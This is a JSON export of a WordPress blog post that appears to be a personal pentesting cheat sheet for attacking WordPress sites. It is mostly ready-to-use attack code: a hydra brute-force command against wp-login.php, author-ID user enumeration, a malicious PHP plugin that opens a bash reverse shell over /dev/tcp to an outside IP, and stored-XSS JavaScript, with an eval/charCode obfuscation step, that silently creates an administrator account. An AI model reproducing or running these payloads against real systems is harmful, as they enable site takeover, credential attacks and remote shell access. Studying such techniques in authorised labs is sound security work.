{"id":14,"date":"2017-01-18T12:00:29","date_gmt":"2017-01-18T11:00:29","guid":{"rendered":"http:\/\/itsec.andreas-klingler.de\/?p=14"},"modified":"2024-06-10T20:47:08","modified_gmt":"2024-06-10T18:47:08","slug":"wpscan","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=14","title":{"rendered":"WordPress"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\" id=\"enumeration\">Enumeration<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/wpscanteam\/wpscan\">Github<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">wpscan --url $target <\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Maybe an <span class=\"caps\">API<\/span> token could be use\u00adful \u2014 then, the Word\u00adPress Vul\u00adner\u00ada\u00adbil\u00adi\u00adty Data\u00adbase is&nbsp;used.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"login-brute-force\">Login brute&nbsp;force<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -l thinc -P best110.txt 10.11.1.234 -V http-form-post '\/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log In&amp;testcookie=1:S=Location'<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Check users:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http:\/\/spectra.htb\/main\/?author=1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http:\/\/spectra.htb\/main\/?author=2<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u2026<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Most beautiful wordpress plugin<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>&lt;?php \n\/*\nPlugin Name: Super plugin\n*\/\nexec(\"\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/192.168.178.65\/4444 0&gt;&amp;1'\");\n?&gt;<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">XSS<\/span> injection<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">If there is a way to inject code some\u00adwhere (e.g. via a plu\u00adg\u00adin) which could also be viewed\/executed by an admin, we could try to cre\u00adate an own admin account via a stored <span class=\"caps\">XSS<\/span> injection.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Pre\u00adpare the javascript code:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>var ajaxRequest = new XMLHttpRequest();\nvar requestURL = \"\/wp-admin\/user-new.php\";\nvar nonceRegex = \/ser\" value=\"([^\"]*?)\"\/g;\najaxRequest.open(\"GET\", requestURL, false);\najaxRequest.send();\nvar nonceMatch = nonceRegex.exec(ajaxRequest.responseText);\nvar nonce = nonceMatch[1];\nvar params = \"action=createuser&amp;_wpnonce_create-user=\"+nonce+\"&amp;user_login=attacker&amp;email=attacker@attacker.local&amp;pass1=password&amp;pass2= password&amp;role=administrator\";\najaxRequest = new XMLHttpRequest();\najaxRequest.open(\"POST\", requestURL, true);\najaxRequest.setRequestHeader(\"Content-Type\", \"application\/x-www-form-urlencoded\");\najaxRequest.send(params);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Min\u00adi\u00admize the code (e.g. via <a href=\"https:\/\/jscompress.com\/\">jscompress.com<\/a>). Then, encode it, e.g. with the fol\u00adlow\u00ading function:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>function encode_to_javascript(string) {\n            var input = string\n            var output = '';\n            for(pos = 0; pos &lt; input.length; pos++) {\n                output += input.charCodeAt(pos);\n                if(pos != (input.length - 1)) {\n                    output += \",\";\n                }\n            }\n            return output;\n        }\n        \nlet encoded = encode_to_javascript('insert_minified_javascript')\nconsole.log(encoded)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Inject the script now:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>&lt;script&gt;eval(String.fromCharCode(\u2026))&lt;\/script&gt;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u2026 and wait for the code to be executed.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Enu\u00admer\u00ada\u00adtion Github wpscan \u2013url $tar\u00adget Maybe an <span class=\"caps\">API<\/span> token could be use\u00adful \u2014 then, the Word\u00adPress Vul\u00adner\u00ada\u00adbil\u00adi\u00adty Data\u00adbase is&nbsp;used. Login brute&nbsp;force hydra \u2011l thinc \u2011P best110.txt 10.11.1.234 \u2011V http-form-post \u2018\/wp-login.php:log=^<span class=\"caps\">USER<\/span>^<span class=\"amp\">&amp;<\/span>pwd=^<span class=\"caps\">PASS<\/span>^<span class=\"amp\">&amp;<\/span>wp-submit=Log In<span class=\"amp\">&amp;<\/span>testcookie=1:S=Location\u2019 Check users: http:\/\/spectra.htb\/main\/?author=1 http:\/\/spectra.htb\/main\/?author=2 \u2026 Most beau\u00adti\u00adful word\u00adpress plu\u00adg\u00adin <span class=\"caps\">XSS<\/span> injec\u00adtion If there is a way to inject code some\u00adwhere (e.g. via a plugin)&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[470,475,477],"tags":[6,270,271],"class_list":["post-14","post","type-post","status-publish","format-standard","hentry","category-active-enum","category-attack-tool","category-software","tag-wordpress","tag-wp_scan","tag-wpscan"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/14","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14"}],"version-history":[{"count":12,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/14\/revisions"}],"predecessor-version":[{"id":3922,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/14\/revisions\/3922"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}